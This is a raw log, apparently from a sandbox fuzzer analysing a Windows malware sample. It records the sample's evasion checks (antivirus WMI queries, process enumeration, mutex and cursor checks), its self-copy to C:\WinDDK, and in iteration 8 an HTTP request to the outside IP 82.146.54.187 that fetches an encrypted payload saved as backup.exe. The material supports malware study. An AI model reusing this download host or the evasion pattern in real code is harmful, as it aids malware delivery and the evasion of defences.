[*] P1-iteration: 1 - Start-KUserTickCount: 13106
[*] Phase1 for Api: GetModuleFileNameA @ 11B7F31 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Phase1 for Api: CreateFileW @ 11BED95 => FAIL
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Phase1 for Api: CreateFileW @ 11BED95 => SUCCEED (SUPPRESSED)
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Phase1 for time-query API (GetSystemTimeAsFileTime@11ADF59)
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] Phase1 for Api: CreateMutexA @ 11A8BE3 => SUCCEED
[*] Phase1 for Api: Process32First @ 11A9DE3 => SUCCEED
[*] Phase1 for Api: Process32Next @ 11A9DFA => SUCCEED
[*] Phase1 for Api: Process32Next @ 11A9ECE => SUCCEED
[*] Phase1 for Api: Process32Next @ 11A9ECE => SUCCEED (SUPPRESSED)
[*] Phase1 for Api: GetModuleFileNameA @ 11A8236 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\Users\student\Desktop\Sandbox\1c8aaf0db310895a76eba04771d573993d76411539f8ec8d2a194820210d53b4.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Phase1 for Api: CreateFileW @ 11BED95 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\WinDDK.exe - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Phase1 for Api: CreateFileW @ 11BED95 => SUCCEED (SUPPRESSED)
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\WinDDK\WinDDK.exe
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\WinDDK\WinDDK.exe
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
 |  
[*] To fuzz: GetModuleFileNameA 98097 11B7F31 CPUID 79119 11B350F CreateFileW 126357 11BED95 TimeQueryAPIs 57177 11ADF59 CreateMutexA 35811 11A8BE3 Process32First 40419 11A9DE3 Process32Next 40442 11A9DFA Process32Next 40654 11A9ECE GetModuleFileNameA 33334 11A8236 
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: WriteFile @ 11B4B8C
	IoC APIs: CreateProcessA @ 11A82CC
[+] NZB [2916] HASH [74D9F7E4] SCORE: [2916120] EVASIVE-API [9] POST-EVASIVE-API [3]
[*] Run terminated at KUserTickCount: 13493

[*] P2-iteration: 2 - Start-KUserTickCount: 13496
 |  GetModuleFileNameA - 98097 - 11B7F31 - 0 - 0
 |  CPUID - 79119 - 11B350F - 0 - 0
 |  CreateFileW - 126357 - 11BED95 - 1 - 3
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 2 - 0
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 1
 |  Process32Next - 40654 - 11A9ECE - 4 - 1
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 5
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] New IoC Api: CreateThread @ 11AD9A5
[*] Now Fuzzing Api: CreateMutexA @ 11A8BE3 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New Evasive API: GetCursorPos @ 11A8769 => FAIL
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] WMI::ExecQuery with value: SELECT * FROM ANTIVIRUSPRODUCT @ 11AAB7F
[*] WMI::Get with value: DISPLAYNAME @ 11AAC18
[*] New Evasive API: CreateMutexA @ 11A8C11 => FAIL
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: CreateThread @ 11AD9A5
[-] NZB [2249] HASH [4D78E792]
[*] Run terminated at KUserTickCount: 13908
 |  
[CONFIG] Score: 2249040 - ID: 1 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 2 - Born in run: 2 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 0 0
 ↪   CPUID 79119 11B350F 0 0
 ↪   CreateFileW 126357 11BED95 1 3
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 2 0
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 1
 ↪   Process32Next 40654 11A9ECE 4 1
 ↪   GetModuleFileNameA 33334 11A8236 1 5

[*] P2-iteration: 3 - Start-KUserTickCount: 13908
 |  GetModuleFileNameA - 98097 - 11B7F31 - 1 - 6
 |  CPUID - 79119 - 11B350F - 0 - 0
 |  CreateFileW - 126357 - 11BED95 - 2 - 0
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 1 - 35
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 2
 |  Process32Next - 40654 - 11A9ECE - 4 - 2
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 2
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED (SUPPRESSED)
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] New IoC Api: CreateThread @ 11AD9A5
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New Evasive API: GetCursorPos @ 11A8769 => FAIL
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\Windows\explorer.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\WinDDK\WinDDK.exe
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\WinDDK\WinDDK.exe
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: WriteFile @ 11B4B8C
	IoC APIs: CreateThread @ 11AD9A5
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [2956] HASH [A4D324EC]
[*] Run terminated at KUserTickCount: 14026
 |  
[CONFIG] Score: 2956050 - ID: 2 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 4 - Born in run: 3 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 1 6
 ↪   CPUID 79119 11B350F 0 0
 ↪   CreateFileW 126357 11BED95 2 0
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 1 35
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 2
 ↪   Process32Next 40654 11A9ECE 4 2
 ↪   GetModuleFileNameA 33334 11A8236 1 2

[*] P2-iteration: 4 - Start-KUserTickCount: 14026
 |  GetModuleFileNameA - 98097 - 11B7F31 - 1 - 2
 |  CPUID - 79119 - 11B350F - 1 - 0
 |  CreateFileW - 126357 - 11BED95 - 1 - 10
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 2 - 0
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 3
 |  Process32Next - 40654 - 11A9ECE - 4 - 3
 |  GetModuleFileNameA - 33334 - 11A8236 - 0 - 0
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\Backup.txt
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\Backup.txt
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\Backup.txt
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\Backup.txt
[*] New IoC Api: CreateThread @ 11AD9A5
[*] Now Fuzzing Api: CreateMutexA @ 11A8BE3 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New Evasive API: GetCursorPos @ 11A8769 => FAIL
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\Backup.txt
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\Backup.txt
[*] WMI::ExecQuery with value: SELECT * FROM ANTIVIRUSPRODUCT @ 11AAB7F
[*] WMI::Get with value: DISPLAYNAME @ 11AAC18
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New Evasive API: CreateMutexA @ 11A8C11 => FAIL
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: WriteFile @ 11B4B8C
	IoC APIs: CreateThread @ 11AD9A5
[-] NZB [2893] HASH [7F304857]
[*] Run terminated at KUserTickCount: 14438
 |  
[CONFIG] Score: 2893050 - ID: 3 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 3 - Born in run: 4 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 1 2
 ↪   CPUID 79119 11B350F 1 0
 ↪   CreateFileW 126357 11BED95 1 10
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 2 0
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 3
 ↪   Process32Next 40654 11A9ECE 4 3
 ↪   GetModuleFileNameA 33334 11A8236 0 0

[*] P2-iteration: 5 - Start-KUserTickCount: 14439
 |  GetModuleFileNameA - 98097 - 11B7F31 - 0 - 0
 |  CPUID - 79119 - 11B350F - 0 - 0
 |  CreateFileW - 126357 - 11BED95 - 2 - 0
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 1 - 36
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 4
 |  Process32Next - 40654 - 11A9ECE - 4 - 4
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 6
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED (SUPPRESSED)
[*] Now Fuzzing Api: CreateMutexA @ 11A8BE3 => RETARGET
[*] New Evasive API: CreateMutexA @ 11A8C11 => FAIL
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\WinDDK\tmp-0.bin
[*] New IoC Api: CreateThread @ 11AD9A5
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New Evasive API: GetCursorPos @ 11A8769 => FAIL
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\ProgramData\VMWareUser.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: WriteFile @ 11B4B8C
	IoC APIs: CreateThread @ 11AD9A5
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [3050] HASH [E1432F2B]
[*] Run terminated at KUserTickCount: 18054
 |  
[CONFIG] Score: 3050070 - ID: 4 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 4 - Born in run: 5 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 0 0
 ↪   CPUID 79119 11B350F 0 0
 ↪   CreateFileW 126357 11BED95 2 0
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 1 36
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 4
 ↪   Process32Next 40654 11A9ECE 4 4
 ↪   GetModuleFileNameA 33334 11A8236 1 6

[*] P2-iteration: 6 - Start-KUserTickCount: 18055
 |  GetModuleFileNameA - 98097 - 11B7F31 - 1 - 5
 |  CPUID - 79119 - 11B350F - 1 - 0
 |  CreateFileW - 126357 - 11BED95 - 1 - 10
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 1 - 36
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 5
 |  Process32Next - 40654 - 11A9ECE - 4 - 5
 |  GetModuleFileNameA - 33334 - 11A8236 - 0 - 0
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] New IoC Api: CreateThread @ 11AD9A5
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\Backup.txt
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\Users\student\Desktop\Pfuzzer-worksite\Backup.txt
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateMutexA @ 11A8BE3 => RETARGET
[*] WMI::ExecQuery with value: SELECT * FROM ANTIVIRUSPRODUCT @ 11AAB7F
[*] WMI::Get with value: DISPLAYNAME @ 11AAC18
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] New Evasive API: CreateMutexA @ 11A8C11 => FAIL
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => NOTHING
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: CreateThread @ 11AD9A5
	IoC APIs: WriteFile @ 11B4B8C
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [3178] HASH [1D174079]
[*] Run terminated at KUserTickCount: 21665
 |  
[CONFIG] Score: 3178060 - ID: 5 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 4 - Born in run: 6 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 1 5
 ↪   CPUID 79119 11B350F 1 0
 ↪   CreateFileW 126357 11BED95 1 10
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 1 36
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 5
 ↪   Process32Next 40654 11A9ECE 4 5
 ↪   GetModuleFileNameA 33334 11A8236 0 0

[*] P2-iteration: 7 - Start-KUserTickCount: 21665
 |  GetModuleFileNameA - 98097 - 11B7F31 - 0 - 0
 |  CPUID - 79119 - 11B350F - 1 - 0
 |  CreateFileW - 126357 - 11BED95 - 2 - 0
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 2 - 0
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 6
 |  Process32Next - 40654 - 11A9ECE - 4 - 6
 |  GetModuleFileNameA - 33334 - 11A8236 - 0 - 0
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED (SUPPRESSED)
[*] Now Fuzzing Api: CreateMutexA @ 11A8BE3 => SUCCEED
[*] New Evasive API: CreateMutexA @ 11A8C11 => FAIL
	IoC APIs: CreateFileW @ 11BED95
[-] NZB [2135] HASH [9415DAE0]
[*] Run terminated at KUserTickCount: 22076
 |  
[CONFIG] Score: 2135020 - ID: 6 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 1 - Born in run: 7 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 0 0
 ↪   CPUID 79119 11B350F 1 0
 ↪   CreateFileW 126357 11BED95 2 0
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 2 0
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 6
 ↪   Process32Next 40654 11A9ECE 4 6
 ↪   GetModuleFileNameA 33334 11A8236 0 0

[*] P2-iteration: 8 - Start-KUserTickCount: 22076
 |  GetModuleFileNameA - 98097 - 11B7F31 - 1 - 2
 |  CPUID - 79119 - 11B350F - 0 - 0
 |  CreateFileW - 126357 - 11BED95 - 3 - 0
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 3 - 0
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 7
 |  Process32Next - 40654 - 11A9ECE - 4 - 7
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 1
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => FAIL
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => FAIL (SUPPRESSED)
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: socket @ 11A773C
[*] New IoC Api: connect @ 11A7793
[*] New IoC Api: send @ 11A77C7
 ~>  Sending: GET /tools/regwrite.raum_encrypted HTTP/1.0
Host: 82.146.54.187
Cache-Control: max-age=0, no-store
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)


[*] New IoC Api: socket @ 11A773C
[*] New IoC Api: connect @ 11A7793
[*] New IoC Api: send @ 11A77C7
 ~>  Sending: GET /tools/regwrite.raum_encrypted HTTP/1.0
Host: 82.146.54.187
Cache-Control: max-age=0, no-store
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1


[*] New Evasive API: CreateFileA @ 11A7C99 => SUCCEED
[*] New IoC Api: CreateFileA @ 11A7C99
 ~>  File name: C:\WinDDK\backup.exe - DesiredAccess: 40000000 - CreationDisposition: 2
[*] New IoC Api: WriteFile @ 11A7CB2
 ~>  Writing to file: \\?\C:\WinDDK\backup.exe
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\backup.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\backup.exe - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: CreateProcessA @ 11A82CC
	IoC APIs: socket @ 11A773C
	IoC APIs: connect @ 11A7793
	IoC APIs: send @ 11A77C7
	IoC APIs: CreateFileA @ 11A7C99
	IoC APIs: WriteFile @ 11A7CB2
[-] NZB [2493] HASH [A026A7F9]
[*] Run terminated at KUserTickCount: 25686
 |  
[CONFIG] Score: 2493090 - ID: 7 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 7 - Born in run: 8 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 1 2
 ↪   CPUID 79119 11B350F 0 0
 ↪   CreateFileW 126357 11BED95 3 0
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 3 0
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 7
 ↪   Process32Next 40654 11A9ECE 4 7
 ↪   GetModuleFileNameA 33334 11A8236 1 1

[*] P2-iteration: 9 - Start-KUserTickCount: 25686
 |  GetModuleFileNameA - 98097 - 11B7F31 - 1 - 1
 |  CPUID - 79119 - 11B350F - 0 - 0
 |  CreateFileW - 126357 - 11BED95 - 1 - 7
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 1 - 36
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 8
 |  Process32Next - 40654 - 11A9ECE - 4 - 8
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 3
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] New IoC Api: WriteFile @ 11B4B8C
